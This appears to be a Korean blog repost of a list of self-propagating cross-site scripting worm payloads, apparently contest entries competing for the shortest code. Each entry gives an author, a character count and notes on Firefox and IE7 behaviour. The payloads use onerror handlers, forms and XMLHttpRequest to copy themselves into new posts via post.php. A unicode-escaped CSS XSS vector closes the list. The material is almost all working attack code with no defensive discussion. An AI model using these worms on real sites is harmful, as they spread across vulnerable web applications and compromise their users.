<form><INPUT name="content"><IMG src="/" onerror="with(parentNode)alert('XSS',submit(action=(method='post')+'.php',content.value='<form>'+innerHTML.slice(0,158)))">


ma1 - 163 Works in FF with no growth then shrinks and then regrows to the same size in IE7.0!!!
<form><INPUT name="content"><IMG src="" onerror="with(parentNode)alert('XSS',submit(action=(method='post')+'.php',content.value='<form>'+innerHTML.slice(0,157)))">


sdc (via dev80) - 142 Doesn't work in Firefox 2.0.0.11
<script>function p(){with(XMLHttpRequest)open("post","past.php"),send("content=<script>"+p.valueOf(alert('xss'))+"p()<\/script>")}p()</script>


dev80 - 145 Doesn't work in Firefox 2.0.0.11
<script>function p() {x=new XMLHttpRequest;x.open("post","past.htm");x.send("content=<script>" + p.valueOf() + "p()<\/script>");}p()</script>


ma1 (via sdc) - 158 Doesn't work in Firefox 2.0.0.11
<form id=_><input name="content"><script>with(_)alert('XSS',submit(action=(method='post')+'.php',content.value='<form id=_>'+innerHTML.slice(0,148)))</script>


barbarianbob - 171 Works in FF with no growth but doesn't work in IE7.0
<b><form id="f"><input name="content"><img src="" onerror="with(f)submit(alert('xss'),content.value=parentNode.innerHTML.bold(),action=(method='post')+'.php')"></form></b>


sdc - 145 Doesn't work in Firefox 2.0.0.11
<form id=z><INPUT name="content"><SCRIPT>with(z)alert('XSS',submit(action=(method='post')+'.php',content.value='<form id=z>'+innerHTML))</SCRIPT>


sdc (via ronald) - 103 Grows
<input name="content"><script>i.content.value=document.body.innerHTML+alert('xss');i.submit();</script>


sdc (via spyware) - 159 Doesn't work in Firefox 2.0.0.11
<form method="POST" name="content" action="post.php"><img src="." onError="content.value=document.content.innerHTML+alert('xss');javascript:content.submit();">


spyware - 149 Doesn't work in Firefox 2.0.0.11
<form method=POST name=content action=post.php <img src=. onError=content.value=document.content.innerHTML+alert('xss');javascript:content.submit();>


ronald - 142 Grows
<form method=post action=post.php name=i><input name=content><script>i.content.value=document.body.innerHTML+alert('xss');i.submit();</script>


ronald - 139 Grows
<form method=post action=post.php name=i><input name=content><script>i.content.value=document.i.innerHTML+alert('xss');i.submit();</script>


ronald - 142 Grows
<form method=post action=post.php name=i><input name=content><script>content.value=document.body.i.innerHTML+alert('xss');i.submit();</script>


spyware - 116 Doesn't work in Firefox 2.0.0.11
<form name=o action=post.php <img src=. onError=o.value=document.body.innerHTML+alert('xss');javascript:o.submit();>


gareth - 229 Doesn't work in Firefox 2.0.0.11 (double encoded)
<script>(function(){alert('XSS');document.write('<form method=post action=post.php><input type=image onerror="form.submit()" src><input value='+escape('<script>('+arguments.callee+')()</scr'+'ipt>')+' name=content>')})()</script>



gareth - 206 Doesn't work in Firefox 2.0.0.11
<script>(function(){alert('XSS');with(document)write('<form method=post action=post.php><input value='+escape('<script>('+arguments.callee+')()</scr'+'ipt>')+' name=content>'),forms[0].submit()})()</script>


Ronald - 139 Grows
<form method=post action=post.php name=i><input name=content><script>content.value=document.body.innerHTML+alert('xss');i.submit();</script>


gareth - 164 Doesn't work in Firefox 2.0.0.11 (double encoded)
<form><input name=content type=image onerror="with(form)action=(method='post')+'.php',i=escape('<form>'+innerHTML);value=i;type='hidden';alert('XSS');submit()" src>


ronald - 119 Grows
<form name="i"><input name="content"><marquee onstart="content.value=document.body.innerHTML+alert('xss');i.submit();">


ronald - 107 Grows
<form name=content><marquee onstart="content.value=document.body.innerHTML+alert('xss');content.submit();">


gareth - 167 Doesn't work in Firefox 2.0.0.11 (double encoded) if you remove escape it shrinks, but does not work in IE7.0
<form><input name=content type=image onerror="f=form;i=f.innerHTML;type='hidden';alert('XSS');f.action=(f.method='post')+'.php';value=escape('<form>'+i);submit()" src>


gareth - 222 Doesn't work in Firefox 2.0.0.11 (double encoded)
<form><input name=content type=image onerror="f=this.form;i=f.innerHTML.replace(/(.*)/,'<form>$1</form>');this.type='hidden';alert('XSS');f.action='post.php';f.method='post';f.content.value=escape(i);submit()" src=></form>



spikeman - 143 Doesn't work in Firefox 2.0.0.11
<form id=z><input name=content><script>with(z)alert('XSS',submit(action=(method='post')+'.php',content.value='<form id=z>'+innerHTML))</script>


ronald - 81 Grows
<script>f.content.value=document.body.innerHTML+alert("xss");f.submit();</script>


bwb labs - 168 Doesn't work in Firefox 2.0.0.11
<script>f=function(){alert("XSS");(x=new XMLHttpRequest).open("post","post.php");x.send("content="+encodeURIComponent("<script>f="+f+";f()</sc"+"ript>"));};f()</script>


bwb labs - 193 Doesn't work in Firefox 2.0.0.11
<script>eval(y="alert('XSS');q=String.fromCharCode(34);(x=new XMLHttpRequest()).open('POST','post.php');x.send('content='+encodeURIComponent('<script>eval(y='+q+y+q+')</sc'+'ript>'))")</script>


sdc - 145 Doesn't work in Firefox 2.0.0.11
<form id=z><input name="content"><script>with(z)alert('XSS',submit(action=(method='post')+'.php',content.value='<form id=z>'+innerHTML))</script>


sdc - 159 Doesn't work in Firefox 2.0.0.11
<form id=z><INPUT name="content"><SCRIPT>with(z)alert('XSS',submit(action=(method='post')+'.php',content.value='<form id=z>'+innerHTML.substr(0,148)))</SCRIPT>


ritz - 162 Works in FF with no growth but does not work in IE7.0
<form><input name="content" src="" onerror="alert('xss');p=form;p.action=(p.method='post')+'.php';value='<form>'+p.innerHTML.substr(0,155);click()" type="image">


sdc (barbarianbob) - 178 Works in FF with no growth but stops working in IE7.0 after first iteration
<b><form action="post.php" method="post"><img src="." onerror="alert('xss');with(parentNode)content.value=parentNode.innerHTML.bold(),submit()"><input name="content"></form></b>


barbarianbob - 165 Grows
<b<form action=post.php method=post><img src=. onerror=alert('xss');with(parentNode)content.value=parentNode.innerHTML.bold(),submit()><input name=content></form</b>


ritz - 176 Doesn't work in Firefox 2.0.0.11
<b><img onerror="alert('xss');with(nextSibling)content.value=parentNode.innerHTML.bold(),action=(method='post')+'.php',submit()" src="">
<form><input name="content"></form></b>


ma1 - 181 Works in FF with no growth and shrinks in IE7.0!!!
<b><img onerror="alert('xss');with(this.nextSibling)content.value=parentNode.innerHTML.bold(),action=(method='post')+'.php',submit()" src=""><form><input name="content"></form></b>


ritz - 187 Works in FF with no growth and shrinks in IE7.0!!!
<b><img src="." onerror="alert('xss');with(this.nextSibling)firstChild.value=parentNode.innerHTML.bold(),submit()"><form method="post" action="post.php"><input name="content"></form></b>


ritz - 181 Doesn't work in Firefox 2.0.0.11
<b><img src="." onerror="alert('xss');with(this.nextSibling)firstChild.value=parentNode.innerHTML.bold(),submit()">
<form method=post action=post.php><input name=content></form></b>


.mario - 166 Doesn't work in Firefox 2.0.0.11
<b<img src=m onerror=alert('xss');with(nextSibling)content.value=parentNode.innerHTML.bold(),submit()><form method=post action=post.php><input name=content></form</b



ma1 - 173 Grows
<b><form method=post action=post.php><img src=. onerror=alert('xss');with(this.parentNode)content.value=parentNode.innerHTML.bold(),submit()><input name=content></form></b>


bwb labs - 188 Works in FF with no growth and shrinks in IE7.0!!!
<b><img onerror="alert('xss');n=(m=this.parentNode).lastChild;n[0].value='<b>'+m.innerHTML+'</b>';n.submit()" src=""><form action="post.php" method="post"><input name="content"></form></b>


ma1 - 174 Grows
<b><img src=. onerror=alert('xss');with(this.nextSibling)content.value=parentNode.innerHTML.bold(),submit()><form method=post action=post.php><input name=content></form></b>


ritz - 191 Grows
<s><img src=. onerror="alert('xss');f=this.nextSibling;f.firstChild.value='<s>'+this.parentNode.innerHTML+'</s>';f.submit()">
<form method=post action=post.php><input name=content></form></s>


arantius - 178 Breaks DOM knowledge rule
<p><form method=post action=post.php><input name=content><script>alert('XSS');F=document.forms;f=F[F.length-1];
f.content.value='<p>'+f.parentNode.innerHTML;f.submit();</script>


barbarianbob - 185 Grows
<b><img src onerror="alert('xss');n=(m=this.parentNode).lastChild;n.content.value='<b>'+m.innerHTML+'</b>';n.submit()"
<form method=post action=post.php><input name=content></form></b>



ritz - 194 Grows
<i><img src=. onerror="alert('xss');(f=(this.nextSibling)).firstChild.value='<i>'+this.parentNode.innerHTML+'</i>';f.submit()">
<form method=post action=post.php><input name=content></form></i>


.mario - 150 Grows
<form method=post action=post.php><img src=x onerror=i=this.parentNode;i.lastChild.value=i.parentNode.innerHTML;i.submit()><input name=content></form>


ritz - 196 Doesn't work in Firefox 2.0.0.11
<i><img src="/" onerror="alert('xss');(f=(this.nextSibling)).firstChild.value='<i>'+this.parentNode.innerHTML+'</i>';f.submit()">
<form method=post action=post.php><input name=content></form></i>


ritz - 195 Doesn't work in Firefox 2.0.0.11
<i><img src="/" onerror=alert('xss');(f=(this.nextSibling)).firstChild.value='<i>'+this.parentNode.innerHTML+'</i>';f.submit()">
<form method=post action=post.php><input name=content></form></i>


matt preston - 223 Doesn't work in Firefox 2.0.0.11
<script>alert('XSS');a='<scr'+'ipt>'+arguments.callee+'()</scr'+'ipt>';document.write('<form method=post action=post.php name=f><input value='+encodeURI(a)+' name=content></form>');body.onload=function(){document.f.submit()}</script>


gareth - 265 Doesn't work in Firefox 2.0.0.11
<script>function(){alert('XSS');a='<scr'+'ipt>'+arguments.callee+'()</scr'+'ipt>';document.write('<form method=post action=post.php name=f><input value='+encodeURIComponent(a)+' name=content></form>');this.onload=function(){document.f.submit()}}()</script>


digi7al64 - 266 Doesn't work in Firefox 2.0.0.11
<p id=e><script>alert('xss');var d=document;s='script>';p='<form method=post name=f action=post.php><input name=content value="+escape("<p id=e>"+d.getElementById(\'e\').innerHTML+"</p>")+"></form><'+s+'d.f.submit();</'+s;p='d.write("'+p+'");'; eval(p);</script></p>
Posted by 김주일


출 처 : http://duple.tistory.com/187


좀 찾아 봐야 함.
<DIV STYLE="background-image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029">

Posted by 김주일